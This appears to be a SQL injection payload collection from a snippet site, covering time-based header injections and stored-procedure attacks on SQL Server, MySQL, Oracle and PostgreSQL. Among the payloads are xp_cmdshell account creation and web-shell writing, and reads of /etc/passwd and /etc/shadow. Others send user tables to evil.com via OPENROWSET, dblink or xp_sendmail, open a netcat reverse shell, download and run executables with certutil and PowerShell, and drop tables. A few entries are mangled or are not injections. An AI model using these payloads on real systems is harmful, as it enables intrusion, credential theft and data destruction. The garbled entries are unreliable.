# Time-based injection with HTTP parameter pollution
id=1' AND SLEEP(5) &id=2' AND SLEEP(5)--
username=admin' AND SLEEP(5) &username=test' AND SLEEP(5)--
password=' AND SLEEP(5) &password=' AND SLEEP(10)--
# Cookie-based time injection
Cookie: sessionid=' AND SLEEP(5)--
Cookie: user_id=' OR pg_sleep(5)--
Cookie: auth=' WAITFOR DELAY '00:00:05'--
# User-Agent time injection
User-Agent: ' AND SLEEP(5)--
User-Agent: ' OR pg_sleep(5)--
User-Agent: ' WAITFOR DELAY '00:00:05'--
# Referer time injection
Referer: ' AND SLEEP(5)--
Referer: ' OR pg_sleep(10)--
Referer: ' WAITFOR DELAY '00:00:05'--
# X-Forwarded-For time injection
X-Forwarded-For: ' AND SLEEP(5)--
X-Forwarded-For: ' OR pg_sleep(5)--
X-Forwarded-For: ' WAITFOR DELAY '00:00:05'--
# Error-based time delays (combining error and time)
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), SLEEP(5)) x FROM information_schema.tables GROUP BY x) a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(database(), SLEEP(5)) x FROM users GROUP BY x) a)--📝 Injections SQL de Procédures Stockées sql
🔴 complex
⭐⭐⭐⭐⭐
Injection SQL via des procédures stockées - xp_cmdshell, sp_oacreate, opérations de fichiers et exécution avancée de commandes de base de données
⏱️ 40 min
🏷️ sql, stored procedures, injection, database, advanced
# Stored Procedure SQL Injection Vectors
# SQL injection through stored procedures and database functions
# SQL Server xp_cmdshell injections
' EXEC xp_cmdshell('dir')--
'; EXEC xp_cmdshell('dir')--
' EXEC xp_cmdshell('net user hacker password /add')--
'; EXEC xp_cmdshell('net user hacker password /add')--
' EXEC xp_cmdshell('ping evil.com')--
'; EXEC xp_cmdshell('ping evil.com')--
' EXEC xp_cmdshell('ipconfig')--
'; EXEC xp_cmdshell('whoami')--
# SQL Server master database procedures
' EXEC master..xp_cmdshell 'dir'--
'; EXEC master..xp_cmdshell 'ping evil.com'--
' EXEC master..sp_configure 'show advanced options', 1--
'; EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE;--
' EXEC master..sp_configure 'xp_cmdshell', 1--
'; EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
# SQL Server sp_oacreate injections
' DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir'--
'; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c ping evil.com'--
# SQL Server sp_adduser injections
' EXEC sp_adduser 'hacker', 'password'--
'; EXEC sp_adduser 'admin', 'password123'--
# MySQL stored procedure injections
' CALL shell('dir')--
'; CALL shell('ls -la')--
' DO SLEEP(5)--
'; DO SLEEP(10)--
' EXECUTE immediate 'SLEEP(5)'--
# Oracle stored procedure injections
' EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' EXEC DBMS_LOCK.SLEEP(5)--
'; EXEC DBMS_LOCK.SLEEP(10)--
' EXEC DBMS_SQLHASH.HASH('test')--
'; EXEC DBMS_RANDOM.STRING('a', 10)--
# PostgreSQL stored procedure injections
' SELECT pg_sleep(5)--
'; SELECT pg_sleep(10)--
' EXECUTE 'SELECT pg_sleep(5)'--
'; EXECUTE 'SELECT pg_sleep(10)'--
' SELECT dbms_pipe.receive_message('x', 5)--
# INTO OUTFILE injections (MySQL)
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
'; UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
' UNION SELECT NULL, NULL, NULL INTO OUTFILE '/tmp/test.txt'--
'; SELECT * FROM users INTO OUTFILE '/var/www/html/users.txt'--
# INTO DUMPFILE injections (MySQL)
' UNION SELECT 1,2 INTO DUMPFILE '/var/www/html/test.txt'--
'; UNION SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/var/www/html/info.php'--
# LOAD_FILE injections (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
'; UNION SELECT LOAD_FILE('C:/Windows/win.ini')--
' UNION SELECT LOAD_FILE('/var/www/html/config.php')--
'; SELECT LOAD_FILE('/etc/shadow')--
# BCP utility injections (SQL Server)
' EXEC master..xp_cmdshell 'bcp "SELECT * FROM users" queryout C:\\Users\\Public\\users.txt -c -T'--
'; EXEC master..xp_cmdshell 'bcp database.dbo.users queryout C:\\Users\\Public\\users.txt -c -T'--
# OPENROWSET injections (SQL Server)
' UNION SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', 'C:\\Windows\\system32\\drivers\\etc\\hosts', 'SELECT * FROM hosts')--
# OPENJSON injections (SQL Server 2016+)
' SELECT * FROM OPENJSON((SELECT * FROM users FOR JSON PATH))--
'; SELECT * FROM OPENJSON((SELECT username, password FROM users FOR JSON PATH))--
# EXECUTE with dynamic SQL
' EXEC('SELECT * FROM users')--
'; EXEC('SELECT * FROM admins WHERE username='''admin'''')--
' EXEC('SELECT password FROM users WHERE username=''''admin'''')--
'; EXEC('DROP TABLE users')--
# EXECUTE with user input
'; EXEC('SELECT * FROM users WHERE username=''' + REPLACE(@input, '''', '''''') + '''')--
'; DECLARE @sql NVARCHAR(1000); SET @sql = 'SELECT * FROM users WHERE username=''' + @input + ''''; EXEC(@sql)--
# sp_executesql injections (SQL Server)
' EXEC sp_executesql N'SELECT * FROM users WHERE username = @name', N'@name VARCHAR(100)', @name = 'admin'--
'; EXEC sp_executesql N'SELECT * FROM users'--
' EXEC sp_executesql N'DELETE FROM users WHERE id = @id', N'@id INT', @id = 1--
# MySQL EXECUTE with prepared statements
' SET @sql = CONCAT('SELECT * FROM users WHERE username = ''', @input, ''''); PREPARE stmt FROM @sql; EXECUTE stmt;--
'; SET @sql = 'SELECT * FROM users'; PREPARE stmt FROM @sql; EXECUTE stmt; DEALLOCATE PREPARE stmt;--
# PostgreSQL EXECUTE with dynamic queries
' EXECUTE 'SELECT * FROM users WHERE username = $1' USING 'admin'--
'; EXECUTE 'SELECT * FROM users'--
' DO $$ BEGIN EXECUTE 'SELECT * FROM users WHERE username = ' || quote_literal($1) USING 'admin'; END $$;--
# Oracle EXECUTE IMMEDIATE
' EXECUTE IMMEDIATE 'SELECT * FROM users WHERE username = ''admin'''--
'; EXECUTE IMMEDIATE 'DROP TABLE users'--
' BEGIN EXECUTE IMMEDIATE 'SELECT password FROM users WHERE username = :name' USING 'admin'; END;--
# Database link injections (Oracle)
' UNION SELECT * FROM [email protected]
'; SELECT * FROM users@remote_db--
' INSERT INTO [email protected] VALUES ('hacker', 'password')--
'; DELETE FROM users@remote_db WHERE username='admin'--
# Database link injections (PostgreSQL)
' SELECT * FROM dblink('host=evil.com user=hacker password=secret', 'SELECT * FROM users') AS t1(id INT, username VARCHAR, password VARCHAR)--
'; SELECT * FROM postgres_fdw('SELECT * FROM users')--
# Database link injections (SQL Server)
' SELECT * FROM OPENROWSET('SQLNCLI', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Data Source=evil.com;Integrated Security=SSPI').database.dbo.users--
# Bulk insert injections (SQL Server)
' BULK INSERT users FROM 'C:\\Users\\Public\\users.txt'--
'; BULK INSERT admins FROM 'C:\\Users\\Public\\admins.txt' WITH (FIELDTERMINATOR = ',')--
# SQL injection with IF statements in stored procedures
'; IF EXISTS(SELECT * FROM users WHERE username='admin') DROP TABLE users--
'; IF (SELECT COUNT(*) FROM users) > 0 DROP TABLE users--
'; IF @condition = 'true' BEGIN DROP TABLE users END--
# SQL injection with WHILE loops in stored procedures
'; WHILE EXISTS(SELECT * FROM users) BEGIN DELETE TOP (1) FROM users END--
'; DECLARE @i INT = 1; WHILE @i <= 10 BEGIN INSERT INTO logs (message) VALUES ('test'); SET @i = @i + 1; END--
# SQL injection with CASE statements in stored procedures
'; SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 0 THEN 'true' ELSE 'false' END--
'; UPDATE users SET password = CASE WHEN username = 'admin' THEN 'newpass' ELSE password END--
# SQL injection with CURSOR in stored procedures
'; DECLARE cursor_users CURSOR FOR SELECT username FROM users; OPEN cursor_users; FETCH NEXT FROM cursor_users; CLOSE cursor_users; DEALLOCATE cursor_users;--
# SQL injection with TRANSACTION in stored procedures
'; BEGIN TRANSACTION; DROP TABLE users; COMMIT;--
'; BEGIN TRAN; UPDATE users SET password = 'hacked'; ROLLBACK;--
# SQL injection with TRY/CATCH in stored procedures
'; BEGIN TRY; DROP TABLE users; END TRY; BEGIN CATCH; SELECT ERROR_MESSAGE(); END CATCH;--
# xp_servicecontrol injections (SQL Server)
' EXEC xp_servicecontrol 'start', 'Schedule'--
'; EXEC master..xp_servicecontrol 'start', 'mssearch'--
# xp_regread injections (SQL Server)
' EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum', '0'--
'; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName'--
# xp_replwritetovarbin with payload (SQL Server)
' DECLARE @data VARCHAR(8000); SELECT @data = 0x44005700...; EXEC xp_replwritetovarbin @data--
# sp_makewebtask injections (SQL Server 2000)
' EXEC sp_makewebtask 'C:\\Inetpub\\wwwroot\\shell.php', 'SELECT "<%=Server.CreateObject(""WScript.Shell"").Exec(""cmd.exe /c dir"")%>"'--
'; EXEC sp_makewebtask '\\evil.com\\share\\shell.php', 'SELECT "<?php system($_GET[""cmd""]); ?>"'--
# xp_sendmail injections (SQL Server)
' EXEC xp_sendmail @recipients = '[email protected]', @message = 'Database compromised'--
'; EXEC master..xp_sendmail @recipients = '[email protected]', @subject = 'SQL Injection Success', @message = (SELECT * FROM users FOR XML PATH)--
# MySQL CREATE FUNCTION injections
'; CREATE FUNCTION shell() RETURNS INT SONAME 'lib_mysqludf_sys.so'--
'; CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT do_system('id');--
# MySQL UDF injection
'; CREATE UDF FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';--
'; SELECT do_system('nc -e /bin/sh evil.com 4444');--
# Advanced stored procedure payload execution
'; EXEC master..xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > C:\\Inetpub\\wwwroot\\cmd.php'--
'; EXEC master..xp_cmdshell 'certutil -urlcache -split -f "http://evil.com/shell.exe" C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe'--
'; DECLARE @cmd VARCHAR(1000); SET @cmd = 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://evil.com/payload.ps1'')"'; EXEC master..xp_cmdshell @cmd;--